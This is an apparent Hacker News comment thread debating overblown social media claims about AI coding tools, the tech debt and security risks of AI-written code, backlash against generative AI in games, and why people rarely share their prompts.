Here are several real stories I dug into:
"My brick-and-mortar business wouldn't even exist without AI" --> meant they used Claude to help them search for lawyers in their local area and summarize permits they needed
"I'm now doing the work of 10 product managers" --> actually meant they create draft PRD's. Did not mention firing 10 PMs
"I launched an entire product line this weekend" --> meant they created a website with a sign up, and it shows them a single javascript page, no customers
"I wrote a novel while I made coffee this morning" --> used a ChatGPT agent to make a messy mediocre PDF
The content of the tweets isn't the thing.. bull-posting or invoking Cunningham's Law is. X is the destination for formula posting and some of those blue checkmarks are getting "reach" rev share kickbacks.
If it was successful, they wouldnt be telling everyone about it
I average 1-2M impressions/month, and have some video clips on X/Twitter that have gotten 100K+ views, and average earnings of around $42/month (over the past year).
I imagine you'd need hundreds of millions of impressions/views on Twitter to earn a living with their current rates.
I pretty much never even went there for technical topics at all, just funny memes and such, but one day recently I started seeing crazy AI hype stories getting posted, and sadly I made a huge mistake and I clicked on one once, and now it’s all I get.
Endless posts from subs like r/agi, r/singularity, as well as the various product specific subs (for Claude, OpenAI, etc). These aren’t even links to external articles, these are supposedly personal accounts of someone being blown away by what the latest release of this or that model or tool can do. Every single one of these posts boils down to some irritating “game over for software engineers” hype fest, sometimes with skeptical comments calling out the clearly AI-generated text and overblown claims, sometimes not. Usually comments pointing out flaws in whatever’s being hyped are just dismissed with a hand wave about how the flaw may have been true at one time, but the latest and greatest version has no such flaws and is truly miraculous, even if it’s just a minor update for that week. It’s always the same pattern.
There’s clearly a lot of astroturfing going on.
There was a story years ago about someone who made hundreds of novels on Amazon, in aggregate they pulled in a decent penny. I wonder if someone's doing the same but with ChatGPT instead.
Taking that 70% solution and adding these things is harder than if a human got you 70% there, because the mistakes LLMs make are designed to look right, while being wrong in ways a sane human would never be. This makes their mistakes easy to overlook, requiring more careful line-by-line review in any domain where people are paying you. They also duplicate code and are super verbose, so they produce a ton tech debt -> more tokens for future agents to clog their contexts with.
I like using them, they have real value when used correctly, but I'm skeptical that this value is going to translate to massive real business value in the next few years, especially when you weigh that with the risk and tech debt that comes along with it.
Since I don't code for money any more, my main daily LLM use is for some web searches, especially those where multiple semantic meanings would be difficult specify with a traditional search or even compound logical operators. It's good for this but the answers tend to be too verbose and in ways no reasonably competent human would be. There's a weird mismatch between the raw capability and the need to explicitly prompt "in one sentence" when it would be contextually obvious to a human.
“I used AI to make an entire NES emulator in an afternoon!” —-> a project that has been done hundreds of times and posted all over github with plenty of references
It is really good in doing this.
those ideas are like UI experiments or small tools helping me doing stuff.
Its also super great in ELI5'ing anything
The last one I did it on was breathlessly touted as "I used [LLM] to do some advanced digital forensics!"
Dawg. The LLM grepped for a single keyword you gave it and then faffed about putting it into json several times before throwing it away and generating some markdown instead. When you told it the result was bad, it grepped for a second word and did the process again.
It looks impressive with all these json files and bash scripts flying by, but what it actually did was turn a single word grep into blog post markdown and you still had to help it.
Some of you have never been on enterprise software sales calls and it shows.
Hah—I'm struggling to decide whether everyone experiencing it would be a good thing in terms of inoculating people's minds, or a terrible thing in terms of what it says about a society where it happens.
Welcome to the internet
I still need to understand every single line of the code to be responsible for it, and that takes the majority of time anyway, and quite often I need to rewrite most of it, because average code is not particularly good, because most code wasn’t produced by senior professionals, but random people making a random python script with only Hello World under their belt. So at the end doesn’t really matter whether I copy paste from a source, or an LLM does the same.
I understand that many coder are happy with the “John made his first script in his life” level of code, but I’m paid well because I can do better, way better. Especially because I need to be responsible for my code, because the companies to whom I work are forced to be responsible.
But of course, when there is no responsibility, I don’t care either. For those home projects where there is exactly zero risks. Even big names seem to use these only to those kind of projects. When they don’t really care.
1) The prompts/pipelines portain to proprietary IP that may or may not be allowed to be shown publically.
2) The prompts/pipelines are boring and/or embarrassing and showing them will dispel the myth that agentic coding is this mysterious magical process and open the people up to dunking.
For example in the case of #2, I recently published the prompts I used to create a terminal MIDI mixer (https://github.com/minimaxir/miditui/blob/main/agent_notes/P...) in the interest of transparency, but those prompts correctly indicate that I barely had an idea how MIDI mixing works and in hindsight I was surprised I didn't get harrassed for it. Given the contentious climate, I'm uncertain how often I will be open-sourcing my prompts going forward.
The results (for me) are very much hit-and-miss and I still see it as a means of last resort rather than a reliable tool that I know the up and downsides of. There is a pretty good chance you'll be wasting your time and every now and then it really moves the needle. It is examples like yours that actually help to properly place the tool amongst the other options.
You nailed it. Prompting is dull and self evident. Sure, you need basic skills to formulate a request. But it’s not a science and has nothing to do with engineering.
1) the code AI produces is full of problems, and if you show it, people will make fun of you, or
2) if you actually run the code as a service people can use, you'll immediately get hacked by people to prove that the code is full of problems.
2) there are plenty of services which do not require state or login and can't be hacked. So still plenty of use cases you can explore. But yes i do agree that Security for production live things are still the biggest worry. But lets be honest, if you do not have a real security person on your team, the shit outthere is not secure anyway. Small companies do not know how to build securely.
Forgive me if this is overly blunt, but this is such a novice/junior mindset. There are many real world examples of things that "worked" but absolutely should not have, and when it blows up, can easily take out an entire company. Unprotected/unrestricted firebase keys living in the client are all the rage right now, yea they "work"until someone notices "hey, I technically have read/write god mode access to their entire prod DB", and then all of a sudden it definitely doesn't work and you've possibly opened yourself to a huge array of legal problems.
The more regulated the industry and the more sensitive the business data, the worse this is exacerbated. Even worse if you're completely oblivious to the possibility of these kinds of things.
Unfortunately the reality is there are far more applications written (not just today but for many years now) by developer teams that will include a dozen dependencies with zero code review because feature XYZ will get done in a few days instead of a few weeks.
And yes, that often comes back to bite the team (mostly in terms of maintenance burden down the road, leading to another full rebuild), but it usually doesn't affect the programmers who are making the decisions, or the project managers who ship the first version.
I have seen production databases reachable from the internet with 8 character password and plenty others.
But my particular point is only about the readability of code from others.
The Cloudflare OAuth lib is impressive, I will readily admit that. But they also clearly mention that of course everything was carefully reviewed, and that not everything was perfect but that the AI was mostly able to fix things when told to. This was surely still a lot of work, which makes this story also much more realistic in my opinion. It surely greatly sped up the process of writing an OAuth library - how much exactly is however hard to say. Especially in security-relevant code, the review process is often longer than the actual writing of the code.
However, I'm not nearly organized enough to save all my prompts! I've tried to do it a few times for my own reference. The thing is, when I use Claude Code, I do a lot of:
- Going back and revising a part of the conversation and trying again—sometimes reverting the code changes, sometimes not.
- Stopping Claude partway through a change so I can make manual edits before I let Claude continue.
- Jumping between entirely different conversation histories with different context.
And so on. I could meticulously document every action, but it quickly gets in the way of experimentation. It's not entirely different from trying to write down every intermediate change you make in your code editor, between actual VCS commits.
I guess I could record my screen, but (A) I promise you don't actually want to watch me fiddle with Claude for hours and (B) it would make me too self-conscious.
It would be very cool to have a tool that goes through Claude's logs and exports some kind of timeline in a human-readable format, but I would need it to be automated.
---
Also, if you can't tell from the above, my use of Claude is very far from "type a prompt, get a finished program." I do a lot of work in order to get useful output. I happen to really enjoy coding this way, and I've gotten great results, but it's not like I'm entering a prompt and then taking a nap.
There's also the lessons on the recent shitstorms in the gaming industry, with Sandfall about Expedition 33's use of GenAI and Larian's comments on GenAI with concept art, where both received massive backlash because they were transparent in interviews about how GenAI was (inconsequentially) used. The most likely consequence of those incidents is that game developers are less likely on their development pipelines.
but, people in general are NOT inclined to pay for AI slop. that is the controversy.
why would I waste my time reading garbage words generated by an LLM? If people wanted this, they would go to the llm themselves. the whole point of artistic expression is to present oneself, to share a perspective. llms do not have a singular point of view, they do not have a perspective, they do not have an cohesive aggregate of experiences. they just regurgitate the average form. no one is interested in this. even when distributed for free, is disrespectful to others that put their time until they realized is just hot garbage yet again.
people are getting tired of low effort `content`, yet again another unity or unreal engine resking, asset flipping `game`...
you get the idea, lots of people will feel offended and disrespected when presented with no effort. got it? it is not exclusively about intellectual property theft also, i don't care about it, i just hate slop.
now whether you like it or not, the new meta is to not look professional. the more personal, the better.
AI is cool for a lot of things, searching, learning, natural language apropos, profiling, surveilling, compressing information...it is fantastic technology! not a replacement for art, never will be.
If your hand is good, throw it down and let the haters weep. If you scared to show your cards, you don't have a good hand and you're bluffing.
In a lesser example, a week ago a Rust developer on Bluesky tried to set up a "Tainted Slopware" list of OSS which used AI, but the criteria for inclusion was as simple as "they accepted an AI-generated PR" and "the software can set up a MCP server." It received some traction but eventually imploded, partially due to the fact that the Linux kernel would be considered slopware due to that criteria.
"Some people expressed disappointment about a thing I think is silly" is literally the center square on the gamer outrage bingo card lol. Same with "someone made a list that I think is kind of stupid".
And again, so what? Why should you care? Again, if you feel that insecure about it, it's you and your work that's the problem, not the haters who are always going to exist. Have the courage of your own convictions or maybe admit that it isn't that strong of a conviction lol.
Pulling this victim-blaming sentence out of context to show how ridiculous it is.
Given this stance, I think GPs reasoning for not publicly bragging about using AI makes perfect sense.
Why paint a target on your back? Why acquiesce to "show us your AI" just to be mobbed by haters?
Fuck that, let them express their frustrations elsewhere.
What I'm saying is that _feeling_ of insecurity doesn't come from haters, because haters gonna hate, it's a sign that _your_ work might not be as good as you think it is, and you don't feel that you can stand behind it.
That said, I use Antigravity with great success for self hosted software. I should publish it.
Why haven't I?
* The software is pretty specific to my requirements.
* Antigravity did the vast amount of work, it feels unworthy?
* I don't really want a project, but that shouldn't really stop me pushing to a public repo.
* I'm a bit hesitant to "out" myself?
Nonetheless, even though I'm not the person, I'm surprised there isn't more evidence out there.
I think this is true for me as well. I have two types of projects that I’ve been working on - small ones with a mix of code I wrote and AI. I have posted these, as I spent a lot of time guiding the AI, cleaning up the AI’s output, and I think the overall project has value that others can learn from and built on.
But I also have some that are almost 100% vibe-coded. First, those would take a lot of time to clean up and write documentation for to make them publishable/useful.
But also, I do think they feel “unworthy”. Even though I think they can be helpful, and I was looking for open-source versions of those things. But how valuable can it really be if I was able to vibe-code it in a few prompts? The next person looking for it will probably do the same thing I did and vibe-code their own version after a few minutes.
https://github.com/schoenenbach/thermal-bridge https://thermal-bridge.streamlit.app/
Of course you can also get rich selling scams.
[1] to farm reward points to get cosmetic items in video games
One of the times I think the draconian approach Apple has towards employee speaking as an associate of the firm without explicit authorization is the correct one.
Humans have always been performative with those outside of their immediate social circle. Politics is effectively the art of performance, and using it to gain influence and power. With legacy media the general public was still largely on the receiving end of it, but modern technology and social media have given that ability to anyone capable of building an audience. So now performative behavior is everywhere, since we're all competing to get our voice heard, to experience adoration, fame, power, fortune. We're in this weird state where this is all done in digital worlds, where it's easier than ever to fabricate an image, and yet it all ends up affecting the real world in one way or another. Our leaders are celebrities who are good at this game, and not necessarily people worthy of this position.
Honestly, I have little faith we can turn this around. It's going to get much worse before it gets better, if at all.
I don't think Rakyll or Andrej are claiming these things; I think they're assuming their readers share more context with them and that it's not necessary to re-tread that every time they post about their surprise at AI currently being better than they expected. I've had the experience multiple times now of reading posts from people like them, nodding along, and then reading breathless quote-tweets of those very same posts exclaiming about how it means that AGI is here right now.
This matters a lot to us because the difference in performance of our workflows can be the difference in $10/day in costs and $1000/day in costs.
Just like TFA stresses, it’s the expertise in the team that pushes back against poor AI-generated ideas and code that is keeping our business within reach of cash flow positive. ~”Surely this isn’t the right way to do this?”
- accountability
- reliability
- validation
- security
- liability
Humans can reliably produce text with all of these features. LLMs can reliably produce text with none of them.
If it doesn't have all of these, it could still be worth paying for if it's novel and entertaining. IMO, LLMs can't really do that either.
these are the kinds of people that can use generative AI best IMO. Deep domain knowledge is needed to spot when the model output is wrong even though it sounds 100% correct. I've seen people take a model's output as correct to a shocking degree like placing large bets at a horse track after uploading a pic of the schedule to ChatGPT. Many people believe whatever a computer tells them but, in their defense, no one has had to question a large calculation done by a calculator until now.
But I would never sit down to convince a person who is not a friend. If someone wanted me to do that, I'd expect to charge them for it. So the guys who are doing it for free are either peddling bullshit or they have some other unspecified objective and no one likes that.
Like, screw the whole “artisanal small-batch software” argument—there are massive new systems being written in C every day despite decades of claims that it is an obsolete language doomed to be replaced by better alternatives. Those alternatives caught on in some segments and not in others. Electric cars caught on in some segments and not in others. Steel-and-concrete building construction caught on in some segments and not in others. It’ll be fine.
Claiming the steroids they’re taking are doing all the work and they don’t need to put in work anymore.
We're drowning in tweets, posts, news... (way more than anyone can reasonably consume). So what rises to the top? The most dramatic, attention-grabbing claims. "I built in 1 hour what took a team months" gets 10k retweets. "I used AI to speed up a well-scoped prototype after weeks of architectural thinking" gets...crickets
Social platforms are optimized for engagement, not accuracy. The clarification thread will always get a fraction of the reach of the original hype. And the people posting know this.
The frustrating part is there's no easy fix. Calling it out (like this article does) get almost no attention. And the nuanced followup never catches up with the viral tweet.
Google engineer says Claude Code built in one hour what her team spent a year on - https://news.ycombinator.com/item?id=46477966 - Jan 2026 (81 comments)
I respect Jaana and have been following her for years. I'd expect she ought to know how that claim would have been understood. But I guess that's the only way to go viral nowadays.
Also, this incident goes to show how the self-proclaimed AI influencer, Rohan Paul, puts a lot of thought and importance into sharing "news" about AI. As if it were not enough to share Jaana's bold claim without hesitation, he also emphasized it with an illustrious commentary: "Dario Amodei was so right about AI taking over coding."
Slop, indeed.
Sitting 2 hours with an Ai agent developing end to end products does.
This tactic mirrors the strategies of tabloids, demagogues, and social media’s for-profit engagement playbook (think Zuckerberg, Musk, and the like). It’s a race to the bottom, eroding public trust and undermining the foundations of our society - all for short-term personal gain.
What’s even more disheartening is how this dynamic rewards self-promotion over substance. Today’s "experts" are often those who excel at marketing themselves, while the most knowledgeable and honest voices remain in the shadows. Their "flaw"? Refusing to sacrifice integrity for attention.
It does not matter if they get the details wrong, its just that it needs to be vague enough, and exciting enough. Infact vagueness and not sharing the code part signals they are doing something important or they are 'in the know' which they cannot share. The incentives are totally inverted.
> The tech community must shift its admiration back toward reproducible results and away from this “trust-me-bro” culture.
Well said, in my opinion.
This is truly impressive and not only hype.
Things have been impressive at least since April 2025.
Masks during Covid and LLMs, used as political pawns. It’s kind of sad.
“yes it will”, “no it won’t” - nobody really knows, it's just a bunch of extremely opinionated people rehashing the same tired arguments across 800 comments per thread.
There’s no point in talking about it anymore, just wait to see how it all turns out.
Doesn't help that no one talks about exactly what they are doing and exactly how they are doing it, because capitalism vs open technology discussions meant to uplift the species.
The age of niche tech microcelebrities is on us. It existed a bit in the past (ESR, Uncle Bob, etc), but is much more of a thing now. Some of them make great content and don't say ridiculous things. Others not so much.
Even tech executives are aping it...
If AI was so good today, why isn't there an explosion of successful products? All we see is these half baked "zomg so good bro!" examples that are technically impressive, but decisively incomplete or really, proof of concepts.
I'm not saying LLMs aren't useful, but they're currently completely misrepresented.
Hype sells clicks, not value. But, whatever floats the investors' boat...
Instead all we get is anecdata from influencers and entrepreneurs, and the technology being shoved into every brand and product. It's exhausting.
At least it seems that the tide is starting to turn. Perhaps we are at the downward slope of the Peak of Inflated Expectations.
Someone mentioned to me they're like the historical paper boys who used to yell Extra Extra and announcing something trying to sell newspapers.
My wife, who has no clue about coding at all, chatgpted a very basic android app only with guidance of chatgpt. She would never ever been able to do this in 5 hours or so without my guidance. I DID NOT HELP HER at all.
I'm 'vibecoding' stuff small stuff for sure, non critical things for sure but lets be honest, i'm transforming a handfull of sentences and requirements into real working code, today.
Gemini 3 and Claude Opus 4.5 def feel better than their prevous versions.
Do they still fail? Yeah for sure but thats not the point.
The industry continues to progress on every single aspect of this: Tooling like claude CLI, Gemini CLI, Intellij integration, etc., Context length, compute, inferencing time, quality, depth of thinking etc. there is no current plateau visible at all.
And its not just LLMs, its the whole ecosystem of Machine Learning stuff: Highhly efficient weather model from google, Alpha fold, AlphaZero, Roboticsmovement, Environment detection, Image segmentation, ...
And the power of claude for example, you will only get with learning how to use it. Like telling it your coding style, your expectations regarding tests etc. We often assume, that an LLM should just be the magic work collegue 10x programmer but its everything an dnothing. If you don't communicate well enough it is not helpful.
And LLMs are not just good in coding, its great in reformulating emails, analysing error messages, writing basic SVG files, explaining kubernetes cluster status, being a friend for some people (see character.ai), explaining research paper, finding research, summarizing text, the list is way to long.
Alone 2026 there will go so many new datacenters live which will add so much more compute again, that the research will continue to be faster and more efficient.
There is also no current bubble to burst, Google fights against Microsoft, Antrophic and co. while on a global level USA competets with China and the EU on this technology. The richest companies on the planet are investing in this tech and they did not do this with bitcoins because they understod that bitcoin is stupid. But AI is not stupid.
Or Machine learing is not stupid.
Do not underestimate the current status of AI tools we have, do not underestimate the speed, continues progress and potential exponential growth of this.
My timespan expecation for obvious advancments in AI is 5-15 years. Experts in this field predict already 2027/2030.
But to iterate over this: a few years ago no one would have had a good idea how we could transform basic text into complex code in such a robust way, which such diverse input (different language, missing specs, ...) . No one. Even 'just generating a website'.
you know Google used to have a app for this
https://www.youtube.com/watch?v=8ADwPLSFeY8
I swear people have forgotten how productive native programming 30 years ago was (Delphi, even VB)
compared to the disaster that is the web today
When that hole wasn't as big, it seemed fewer software projects failed.
In one light it is super impressive and amazing progress, in another light it is not impressive at all and totally over hyped.
Using the Hubert Dreyfus analogy. It is impressive if the goal is to climb as high as we can up giant tree. The height we have reached isn't impressive at all though if we are trying to climb the tree to get to the moon.
I'm advocating for spending time with AI because it works already good enough and it continues to progress surprisingly fast. Unexperienced fast for me tbh.
If i say "AI is great" i also know when AI is also stupid but i'm already/stil so impressed that i can transform basic text into working go/java whatever code, that i accept that its not perfect just because I highly appreciate how fast we got this.
And it feels weird too tbh. It doesn't feel special to talk to an LLM and get code back somehow while this was unthinkable just a few years back.
Somethimes it likes you just forget about all these facts and have to remind yourself that this is something new.
> If you're confident that you know how to securely configure and use Wireguard across multiple devices then great
https://news.ycombinator.com/item?id=46581183
What happened to your overconfidence in LLMs ability to help people without previous experience do something they were unable to before?
> Your Firefox settings blocked this content from tracking you across sites or being used for ads.
Why is this website serving such crap?
For God's sake, if there is anything absolutely worth showing on X, just include a screenshot of it instead of subjecting us all to that malware.